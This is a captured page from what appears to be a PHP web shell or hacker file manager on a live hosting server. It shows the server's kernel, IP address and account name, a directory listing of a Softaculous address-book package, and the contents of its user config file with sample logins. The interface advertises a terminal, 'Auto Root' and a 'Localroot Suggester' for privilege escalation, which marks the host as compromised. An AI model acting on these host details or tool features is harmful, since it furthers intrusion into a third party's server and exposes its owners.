Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
phpaddr /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-02-27 06:47
php53
[ DIR ]
drwxr-xr-x
2026-02-27 06:47
php56
[ DIR ]
drwxr-xr-x
2026-02-27 06:47
php71
[ DIR ]
drwxr-xr-x
2026-02-27 06:47
php81
[ DIR ]
drwxr-xr-x
2026-02-27 06:47
php82
[ DIR ]
drwxr-xr-x
2026-02-27 06:47
cfg.db.php
957
B
-rwxr-xr-x
2021-12-23 05:54
cfg.user.php
1.34
KB
-rwxr-xr-x
2021-12-23 05:54
clone.php
3.34
KB
-rwxr-xr-x
2024-05-02 06:22
fileindex.php
498
B
-rwxr-xr-x
2021-12-23 05:54
import.php
2.96
KB
-rwxr-xr-x
2024-05-02 06:22
info.xml
1.61
KB
-rwxr-xr-x
2024-05-02 04:25
install.js
921
B
-rwxr-xr-x
2021-12-23 05:54
install.php
3.68
KB
-rwxr-xr-x
2024-05-02 06:22
install.xml
460
B
-rwxr-xr-x
2021-12-23 05:54
md5
5.52
KB
-rwxr-xr-x
2024-05-02 06:22
notes.txt
62
B
-rwxr-xr-x
2021-12-23 05:54
Save
Rename
<?php // // == List of Login/Pass-Users == // // -- Setup an "admin" user, with password "secret" -- $userlist['admin']['pass'] = "[[admin_pass]]"; $userlist['admin']['role'] = "root"; // used to call "/diag.php" //* // -- Setup readonly-user for regression tests (yourdomain.com/addressbook/test/ $userlist['simpletest']['pass'] = "simple"; $userlist['simpletest']['role'] = "readonly"; $userlist['simpletest']['domain'] = 9999; //*/ /* // Setup a "readonly" user $userlist['view']['pass'] = "apassword"; $userlist['view']['role'] = "readonly"; // Setup a user accessing only one group $userlist['mygroup']['pass'] = "apassword"; $userlist['mygroup']['group'] = "My group"; // Setup a user for the second domain (0 = default) $userlist['adm2']['pass'] = "adm2"; $userlist['adm2']['domain'] = 1; //*/ // // == User table in database == // - Excludes the table_prefix! $usertable = "users"; // == List of IP-Users == // /* $iplist['169.168.1.1']['role'] = "admin"; $iplist['169.168.1.1']['role'] = "readonly"; */ // // == Look & Feel of the domains // $skin_color = "red"; // global skin color, e.g. on login // blue, brown, green, grey, pink, purple, red, turquoise, yellow $domain[0]['skin'] = "red"; $domain[1]['skin'] = "pink"; $domain[2]['skin'] = "yellow"; ?>